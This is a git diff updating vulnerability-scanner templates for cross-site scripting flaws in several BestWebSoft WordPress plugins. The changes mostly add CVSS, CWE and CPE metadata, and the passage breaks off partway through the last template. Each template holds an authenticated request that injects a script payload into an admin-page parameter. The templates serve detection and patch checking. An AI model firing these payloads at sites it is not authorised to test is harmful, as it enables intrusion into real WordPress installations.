epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: custom_admin_page + framework: wordpress + publicwww-query: "/wp-content/plugins/custom-admin-page/" + tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4b0a00483046022100a5bf4c8ded2464a0b144ae1acdcddede4339f2a7b0d9ad53695fb3c068728a60022100ea33e422fc96b2695b93bd46522d8ae78f8c6b150072685aabc344dd0a4996c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a5bf4c8ded2464a0b144ae1acdcddede4339f2a7b0d9ad53695fb3c068728a60022100ea33e422fc96b2695b93bd46522d8ae78f8c6b150072685aabc344dd0a4996c1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 2dd5dd71b7..65195db647 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18494 - -info: - name: Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18494 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18494 - - https://wordpress.org/plugins/custom-search-plugin/#developers - classification: - cve-id: CVE-2017-18494 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/custom-search-plugin/" - tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Custom Search by")' +id: CVE-2017-18494 + +info: + name: Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18494 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18494 + - https://wordpress.org/plugins/custom-search-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18494 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: custom_search + framework: wordpress + publicwww-query: "/wp-content/plugins/custom-search-plugin/" + tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Custom Search by")' condition: and -# digest: 490a00463044022033c93710bb1075598600370aee16ba702b2cff936171fc39ff6b68af7406851f02206571f904c02cb2da40029454ecf8c72098149a76656032e0d245b19b827cd47d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022033c93710bb1075598600370aee16ba702b2cff936171fc39ff6b68af7406851f02206571f904c02cb2da40029454ecf8c72098149a76656032e0d245b19b827cd47d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 84d59bc21e..ef9cbce64a 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18496 - -info: - name: Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18496 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18496 - - https://wordpress.org/plugins/htaccess/#developers - classification: - cve-id: CVE-2017-18496 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/htaccess/" - tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Htaccess by")' +id: CVE-2017-18496 + +info: + name: Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18496 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18496 + - https://wordpress.org/plugins/htaccess/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18496 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: htaccess + framework: wordpress + publicwww-query: "/wp-content/plugins/htaccess/" + tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4a0a00473045022100f46490fef9a8edce85fd7edf1a5b74587bba1684e3ebb9b64c482326986c23f702206cb9e5a4d7ab5293e40948ec77b2dcdd44d81f6a26661dea48caabccd46a3991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f46490fef9a8edce85fd7edf1a5b74587bba1684e3ebb9b64c482326986c23f702206cb9e5a4d7ab5293e40948ec77b2dcdd44d81f6a26661dea48caabccd46a3991:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 5d7c8e06b5..7b06eff9a3 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18500 - -info: - name: Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The social-buttons-pack plugin before 1.1.1 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18500 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18500 - - https://wordpress.org/plugins/social-buttons-pack/#developers - classification: - cve-id: CVE-2017-18500 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/social-buttons-pack/" - tags: cve,cve2017,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Social Buttons Pack by")' +id: CVE-2017-18500 + +info: + name: Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The social-buttons-pack plugin before 1.1.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18500 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18500 + - https://wordpress.org/plugins/social-buttons-pack/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18500 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: social_buttons_pack + framework: wordpress + publicwww-query: "/wp-content/plugins/social-buttons-pack/" + tags: cve,cve2017,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022100c498533346d682ee761bf2b6edb01085603f1a49321e819bbe69e5525fdb0ece02203b9b7a2e2752c7363a174212063dad64c55f9412a03d032f80ef0b8eb3a19e7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c498533346d682ee761bf2b6edb01085603f1a49321e819bbe69e5525fdb0ece02203b9b7a2e2752c7363a174212063dad64c55f9412a03d032f80ef0b8eb3a19e7e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 943704c0a2..0d6ef6393c 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18501 - -info: - name: Social Login by BestWebSoft < 0.2 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18501 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18501 - - https://wordpress.org/plugins/social-login-bws/#developers - classification: - cve-id: CVE-2017-18501 - metadata: - max-request: 3 - verified: true - publicwwww-query: "/wp-content/plugins/social-login-bws/" - tags: cve,cve2017,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Social Login by")' +id: CVE-2017-18501 + +info: + name: Social Login by BestWebSoft < 0.2 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18501 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18501 + - https://wordpress.org/plugins/social-login-bws/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18501 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: social_login + framework: wordpress + publicwwww-query: "/wp-content/plugins/social-login-bws/" + tags: cve,cve2017,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Social Login by")' condition: and -# digest: 490a0046304402200aafdfac32c9b24f2a7a09c98bd46a0c67c92e2bbba99056692065bc5d6d8e9b02201b11a6f9f39157d13d4facdba103034ec7d098a521a0da501af4eeaf1fcfb4f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200aafdfac32c9b24f2a7a09c98bd46a0c67c92e2bbba99056692065bc5d6d8e9b02201b11a6f9f39157d13d4facdba103034ec7d098a521a0da501af4eeaf1fcfb4f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 48531b4171..edcfa14e3c 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18502 - -info: - name: Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The subscriber plugin before 1.3.5 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18502 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18502 - - https://wordpress.org/plugins/subscriber/#developers - classification: - cve-id: CVE-2017-18502 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/subscriber/" - tags: cve,cve2017,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Subscriber by")' +id: CVE-2017-18502 + +info: + name: Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The subscriber plugin before 1.3.5 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18502 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18502 + - https://wordpress.org/plugins/subscriber/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18502 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: subscriber + framework: wordpress + publicwww-query: "/wp-content/plugins/subscriber/" + tags: cve,cve2017,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4b0a00483046022100d34e7d3f64a2760dd2653e2e5ab89d478b62b7a971d2fe47c40f7604143c0415022100c2acb36642d907b82404f2a8062f456db8e8c187b765aca1fc6fc67479e6639d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d34e7d3f64a2760dd2653e2e5ab89d478b62b7a971d2fe47c40f7604143c0415022100c2acb36642d907b82404f2a8062f456db8e8c187b765aca1fc6fc67479e6639d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index b543356448..a7b54c30d8 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18505 - -info: - name: BestWebSoft's Twitter < 2.55 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The twitter-plugin plugin before 2.55 for WordPress has XSS. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18505 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18505 - - https://wordpress.org/plugins/twitter-plugin/#developers - classification: - cve-id: CVE-2017-18505 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/twitter-plugin/" - tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Twitter Button by")' +id: CVE-2017-18505 + +info: + name: BestWebSoft's Twitter < 2.55 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The twitter-plugin plugin before 2.55 for WordPress has XSS. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18505 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18505 + - https://wordpress.org/plugins/twitter-plugin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18505 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: twitter_button + framework: wordpress + publicwww-query: "/wp-content/plugins/twitter-plugin/" + tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4a0a0047304502207d0a23dbe37b8b688a2fcfd888df3f3f95e05edb3e49015f287499da6b790ea9022100f8d92fb2f8890751cd539a2c3b6b703d94fbf029eb93c026c45b01131b995fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502207d0a23dbe37b8b688a2fcfd888df3f3f95e05edb3e49015f287499da6b790ea9022100f8d92fb2f8890751cd539a2c3b6b703d94fbf029eb93c026c45b01131b995fd6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 194abecf3e..d287aff92b 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -1,49 +1,57 @@ -id: CVE-2017-18516 - -info: - name: LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues. - remediation: Fixed in version 1.0.5 - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18516 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18516 - - https://wordpress.org/plugins/bws-linkedin/#developers - classification: - cve-id: CVE-2017-18516 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/bws-linkedin/" - tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "LinkedIn by BestWebSoft")' +id: CVE-2017-18516 + +info: + name: LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.0.5 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18516 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18516 + - https://wordpress.org/plugins/bws-linkedin/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18516 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: linkedin + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-linkedin/" + tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 4a0a004730450220577a143907ffb46743892a47f287ba96ae34604afe464eff1b877c7592b632fa022100c6cfcc56d76f16758e76fcb7ff0d392d8e1e451c661847a80d6efc162761ab74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220577a143907ffb46743892a47f287ba96ae34604afe464eff1b877c7592b632fa022100c6cfcc56d76f16758e76fcb7ff0d392d8e1e451c661847a80d6efc162761ab74:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 411a853082..9a0e2915c1 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -1,49 +1,57 @@ -id: CVE-2017-18517 - -info: - name: Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS issues. - remediation: Fixed in version 1.0.5 - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18517 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18517 - - https://wordpress.org/plugins/bws-pinterest/#developers - classification: - cve-id: CVE-2017-18517 - metadata: - max-request: 2 - verified: true - publicwww-query: "/wp-content/plugins/bws-pinterest/" - tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - 